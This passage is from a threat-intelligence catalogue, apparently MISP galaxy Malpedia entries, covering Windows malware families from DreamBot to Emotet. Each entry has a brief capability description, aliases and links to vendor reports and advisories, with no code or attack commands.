http://blog.nsfocus.net/stumbzarus-apt-lazarus/
https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

DreamBot

2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) 2014 Dreambot (Gozi ISFB variant)

In 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="DreamBot"

DreamBot is also known as:

Table 1746. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot
https://www.youtube.com/watch?v=EyDiIAtdI[https://www.youtube.com/watch?v=EyDiIAtdI]
https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/
https://lokalhost.pl/gozi_tree.txt
https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122
https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451
https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality
https://community.riskiq.com/article/30f22a00

Dridex

OxCERT blog describes Dridex as "an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term." According to MalwareBytes, "Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method." IBM X-Force discovered "a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems."

The tag is: misp-galaxy:malpedia="Dridex"

Dridex is also known as:

Table 1747. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex
https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/
https://securityintelligence.com/dridexs-cold-war-enter-atombombing/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
https://home.treasury.gov/news/press-releases/sm845
https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://unit42.paloaltonetworks.com/travel-themed-phishing/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/
https://twitter.com/TheDFIRReport/status/1356729371931860992
https://www.secureworks.com/research/threat-profiles/gold-heron
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://twitter.com/Cryptolaemus1/status/1407135648528711680
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf
https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps
https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/
https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex
https://viql.github.io/dridex/
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/
https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf
https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt
https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://blog.lexfo.fr/dridex-malware.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization
https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes
https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/
https://www.youtube.com/watch?v=1VB15_HgUkg
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
http://www.secureworks.com/research/threat-profiles/gold-drake
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/
https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/
https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/
http://www.secureworks.com/research/threat-profiles/gold-heron
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/
https://adalogics.com/blog/the-state-of-advanced-code-injections
https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/
https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf
https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/
https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/
https://threatresearch.ext.hp.com/detecting-ta551-domains/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/
https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf
https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77
https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/
https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/
https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware
https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/
https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/
https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction
https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://en.wikipedia.org/wiki/Maksim_Yakubets
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf
https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.secureworks.com/research/threat-profiles/gold-drake
https://malwarebookreports.com/cryptone-cobalt-strike/
https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf
https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf
https://twitter.com/felixw3000/status/1382614469713530883?s=20

DRIFTPIN

Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.

The tag is: misp-galaxy:malpedia="DRIFTPIN"

DRIFTPIN is also known as:

Spy.Agent.ORM
Toshliph

Table 1748. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/

Dripion

The tag is: misp-galaxy:malpedia="Dripion"

Dripion is also known as:

Masson

Table 1749. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion
https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

DriveOcean

Communicates via Google Drive.

The tag is: misp-galaxy:malpedia="DriveOcean"

DriveOcean is also known as:

Google Drive RAT

Table 1750. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean
https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html

DropBook

DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts.

The tag is: misp-galaxy:malpedia="DropBook"

DropBook is also known as:

Table 1751. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook
https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

DROPSHOT

The tag is: misp-galaxy:malpedia="DROPSHOT"

DROPSHOT is also known as:

Table 1752. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/
https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/

Dtrack

Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. Its core functionality includes operations to upload a file to the victim’s computer, download a file from the victim’s computer, dump disk volume data, persistence and more.

A variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.

The tag is: misp-galaxy:malpedia="Dtrack"

Dtrack is also known as:

TroyRAT

Table 1753. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack
https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/
https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20
https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/
https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://securelist.com/my-name-is-dtrack/93338/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md
https://securelist.com/apt-trends-report-q3-2020/99204/
https://blog.macnica.net/blog/2020/11/dtrack.html
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

DualToy (Windows)

The tag is: misp-galaxy:malpedia="DualToy (Windows)"

DualToy (Windows) is also known as:

Table 1754. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy
https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/

DarkHotel

The tag is: misp-galaxy:malpedia="DarkHotel"

DarkHotel is also known as:

Table 1755. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel
https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/
https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN
http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html
https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/

DUBrute

The tag is: misp-galaxy:malpedia="DUBrute"

DUBrute is also known as:

Table 1756. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute
https://github.com/ch0sys/DUBrute

Dumador

The tag is: misp-galaxy:malpedia="Dumador"

Dumador is also known as:

Table 1757. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador

DuQu

The tag is: misp-galaxy:malpedia="DuQu"

DuQu is also known as:

Table 1758. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu
https://docs.broadcom.com/doc/w32-duqu-11-en
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf

DUSTMAN

In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named "DUSTMAN" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack "DUSTMAN" after the filename and string embedded in the malware. "DUSTMAN" can be considered as a new variant of "ZeroCleare" malware, published in December 2019.

The tag is: misp-galaxy:malpedia="DUSTMAN"

DUSTMAN is also known as:

Table 1759. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman
https://twitter.com/Irfan_Asrar/status/1213544175355908096
https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/
https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report
https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

Duuzer

The tag is: misp-galaxy:malpedia="Duuzer"

Duuzer is also known as:

Escad

Table 1760. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer
https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.secureworks.com/research/threat-profiles/nickel-academy

DYEPACK

The tag is: misp-galaxy:malpedia="DYEPACK"

DYEPACK is also known as:

swift

Table 1761. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack
https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch
https://content.fireeye.com/apt/rpt-apt38
https://securelist.com/blog/sas/77908/lazarus-under-the-hood/
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://github.com/649/APT38-DYEPACK

Dyre

The tag is: misp-galaxy:malpedia="Dyre"

Dyre is also known as:

Dyreza

Table 1762. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group
https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/
http://www.secureworks.com/research/threat-profiles/gold-blackburn
https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf
https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/
https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html
https://www.secureworks.com/research/threat-profiles/gold-blackburn
https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/
https://www.secureworks.com/research/dyre-banking-trojan

EASYNIGHT

FireEye describes EASYNIGHT is a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.

Examples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case "printwin.dll!gzwrite64" (breaking the file signature).

The tag is: misp-galaxy:malpedia="EASYNIGHT"

EASYNIGHT is also known as:

Table 1763. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight
https://content.fireeye.com/api/pdfproxy?id=86840
https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

EDA2

The tag is: misp-galaxy:malpedia="EDA2"

EDA2 is also known as:

Table 1764. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom
https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
https://twitter.com/JaromirHorejsi/status/815861135882780673

Egregor

The tag is: misp-galaxy:malpedia="Egregor"

Egregor is also known as:

Table 1765. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html
https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/
https://www.intrinsec.com/egregor-prolock/
https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html
https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/
https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/
https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/
https://twitter.com/redcanary/status/1334224861628039169
https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware
https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf
https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/
https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/
https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/
https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html
https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html
https://www.group-ib.com/blog/egregor
https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/
https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/
https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/
https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/
https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware
https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf
https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/
https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/
https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor
https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf
https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide
https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf
https://securelist.com/targeted-ransomware-encrypting-data/99255/
https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel
https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/
https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/
https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

EHDevel

The tag is: misp-galaxy:malpedia="EHDevel"

EHDevel is also known as:

Table 1766. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel
https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/

ELECTRICFISH

The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.

The tag is: misp-galaxy:malpedia="ELECTRICFISH"

ELECTRICFISH is also known as:

Table 1767. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.us-cert.gov/ncas/analysis-reports/AR19-129A
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

ElectricPowder

The tag is: misp-galaxy:malpedia="ElectricPowder"

ElectricPowder is also known as:

Table 1768. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder
https://www.clearskysec.com/iec/

Elirks

The tag is: misp-galaxy:malpedia="Elirks"

Elirks is also known as:

Table 1769. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks
https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/

Elise

The tag is: misp-galaxy:malpedia="Elise"

Elise is also known as:

EVILNEST

Table 1770. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.elise
https://www.joesecurity.org/blog/8409877569366580427
https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html
https://securelist.com/blog/research/70726/the-spring-dragon-apt/
https://www.secureworks.com/research/threat-profiles/bronze-elgin
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.accenture.com/t20180127T003755Z_w_/us-en/acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf[https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf]
https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
https://www.accenture.com/t20180127T003755Zw/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf[https://www.accenture.com/t20180127T003755Zw/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf]
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf

ELMER

ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.

The tag is: misp-galaxy:malpedia="ELMER"

ELMER is also known as:

Elmost

Table 1771. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer
https://www.symantec.com/security-center/writeup/2015-122210-5724-99
https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/
https://attack.mitre.org/software/S0064
https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Emdivi

The tag is: misp-galaxy:malpedia="Emdivi"

Emdivi is also known as:

Table 1772. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi
http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/
http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html
https://securelist.com/new-activity-of-the-blue-termite-apt/71876/
https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/
https://www.macnica.net/file/security_report_20160613.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/

Emissary

The tag is: misp-galaxy:malpedia="Emissary"

Emissary is also known as:

Table 1773. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.emissary
https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/

Emotet

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time. Emotet has been taken down in January 2021.

The tag is: misp-galaxy:malpedia="Emotet"

Emotet is also known as:

Geodo
Heodo

Table 1774. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
